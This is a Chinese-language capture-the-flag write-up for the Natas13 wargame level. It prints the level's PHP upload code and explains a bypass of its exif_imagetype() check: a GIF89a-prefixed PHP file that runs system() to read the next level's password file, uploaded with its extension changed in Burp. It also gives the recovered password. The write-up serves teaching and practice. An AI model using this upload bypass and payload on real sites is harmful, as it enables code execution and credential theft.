Natas13:

与上一关页面类似,还是文件上传,只是多了提示“出于安全原因,我们现在仅接受图像文件!”。源码如下

  1. function genRandomString() {
  2.     $length = 10;
  3.     $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
  4.     $string = "";    
  5.  
  6.     for ($p = 0; $p < $length; $p++) {
  7.         $string .= $characters[mt_rand(0, strlen($characters)-1)];
  8.     }
  9.  
  10.     return $string;
  11. }
  12.  
  13. function makeRandomPath($dir, $ext) {
  14.     do {
  15.     $path = $dir."/".genRandomString().".".$ext;
  16.     } while(file_exists($path));
  17.     return $path;
  18. }
  19.  
  20. function makeRandomPathFromFilename($dir, $fn) {
  21.     $ext = pathinfo($fn, PATHINFO_EXTENSION);
  22.     return makeRandomPath($dir, $ext);
  23. }
  24.  
  25. if(array_key_exists("filename", $_POST)) {
  26.     $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
  27.  
  28.     $err=$_FILES['uploadedfile']['error'];
  29.     if($err){
  30.         if($err === 2){
  31.             echo "The uploaded file exceeds MAX_FILE_SIZE";
  32.         } else{
  33.             echo "Something went wrong :/";
  34.         }
  35.     } else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
  36.         echo "File is too big";
  37.     } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
  38.         echo "File is not an image";
  39.     } else {
  40.         if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  41.             echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
  42.         } else{
  43.             echo "There was an error uploading the file, please try again!";
  44.         }
  45.     }
  46. } else {

natas13-sourcecode.html

审计源码,发现源码使用exif_imagetype()函数检验文件是否是图片,exif_imagetype()函数会读取一个图像的第一个字节并检查其签名,只要在php文件最前面加上图片信息签名即可绕过。

  1. GIF89a
  2.  
  3. <?php
  4. system('cat /etc/natas_webpass/natas14');
  5. ?>

其余与12题相同。

1.构造一个简单的test.php文件,用于读取/etc/natas_webpass/natas14,GIF89a用于绕过签名检测,代码如上。

2.点击上传php文件,用burp拦截,修改name后缀为php,点击Go,上传成功。

3.URL访问返回的php页面,得到flag。

flag:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas13 Writeup(文件上传,绕过图片签名检测)的更多相关文章

  1. MVC&WebForm对照学习:文件上传(以图片为例)

    原文  http://www.tuicool.com/articles/myM7fe 主题 HTMLMVC模式Asp.net 博客园::首页::  ::  ::  ::管理 5 Posts :: 0 ...

  2. webform文件上传、图片水印、验证码

    文件上传: 所用控件:FileUpload 使用时的思路: 1.判断用户是否选中了文件 FileUpload.FileName获取选中的文件名,判断长度,如果长度大于零就代表已经选择了文件 JS端:通 ...

  3. dwz+jquery+fileupload+springmvc实现文件上传 及图片预览

    1 前台jsp:文件的上传利用了iframe实现局部刷新功能.使用了apache的fileupload组件,用到的jar: commons-fileupload.jar,commons-io.jarD ...

  4. Spring4 MVC 多文件上传(图片并展示)

    开始需要在pom.xml加入几个jar,分别是 <dependency> <groupId>commons-fileupload</groupId> <art ...

  5. PHP之ThinkPHP框架(验证码、文件上传、图片处理)

     验证码 验证码是框架自带有的,比之前使用GD库简单方便许多,其实现原理基本相似,都是生成图片,保存验证码值到Session中,表单提交验证码,然后进行值的对比验证. 简单的显示: <form ...

  6. jsp+springmvc实现文件上传、图片上传和及时预览图片

    1.多文件上传:http://blog.csdn.net/a1314517love/article/details/24183273 2.单文件上传的简单示例:http://blog.csdn.net ...

  7. django文件上传、图片验证码、抽屉数据库设计

    1.Django文件上传之Form方式 settings.py, ALLOWED_HOSTS = ['*'] INSTALLED_APPS = [ 'django.contrib.admin', 'd ...

  8. thinkphp文件上传以及图片处理

    文件上传 上传表单 在ThinkPHP中使用上传功能无需进行特别处理.例如,下面是一个带有附件上传的表单提交: <form action="__URL__/upload" e ...

  9. 文件上传绕过WAF

    文件上传 文件上传实质上还是客户端的POST请求,消息主体是一些上传信息.前端上传页面需要指定 enctype为multipart/from-data才能正常上传文件. 此处不讲各种中间件解析漏洞只列 ...

随机推荐

  1. spring学习笔记二:spring使用构造方法注入(set方式注入)

    项目目录树: 1.spring的依赖包配置 * SPRING_HOME/dist/spring.jar * SPRING_HOME/lib/log4j/log4j-1.2.14.jar * SPRIN ...

  2. JS的时间差换算(String to 自己想要的时间格式)

    JS的时间差换算(String to 标准的时间格式) 1.字符串到标准时间格式: 字符串: var time1="2018-05-11 00:00:00" var time2=& ...

  3. 851. spfa求最短路

    给定一个n个点m条边的有向图,图中可能存在重边和自环, 边权可能为负数. 请你求出1号点到n号点的最短距离,如果无法从1号点走到n号点,则输出impossible. 数据保证不存在负权回路. 输入格式 ...

  4. 吴裕雄--天生自然 PYTHON数据分析:威斯康星乳腺癌(诊断)数据分析(续一)

    drop_list1 = ['perimeter_mean','radius_mean','compactness_mean','concave points_mean','radius_se','p ...

  5. Android 一个3D相册源码

    我们专业课有Android的学习,最后老师让做一个简单的Android应用程序.我在网上找些资料,加上自己改造一下做了一个3D相册. 程序仿照Android的相册功能,调用Gallery类对相片进行浏 ...

  6. JDK_Packages_java_utils

    utils包需要关注的主要有 ​ 集合框架.并发包.函数式编程.观察者模式@see PropertyChangeSupport java.util(集合框架) Contains the collect ...

  7. GIT 使用(二):创建仓库并提交代码

    基本操作 所用命令使用 windows 下安装 git-bash 运行 Table of Contents 先决条件 已经安装了 GIT 客户端 已经设置用户信息 如果没做可以看安装和配置 获取 Gi ...

  8. Python——13定制类

    */ * Copyright (c) 2016,烟台大学计算机与控制工程学院 * All rights reserved. * 文件名:text.cpp * 作者:常轩 * 微信公众号:Worldhe ...

  9. Requests功能整理

    import requests # GET r = requests.get('https://api.github.com/events') # POSTr = requests.post('htt ...

  10. PyQt5之俄罗斯方块

    上个礼拜有个需求,对csv里的数据按条件进行拆分计算.一想到要做计算,少不了pandas.还有个要求最好是生成命令行工具或者带有界面. 于是尝试下,使用PyQt5做了个简单的UI界面给程序包个壳子,然 ...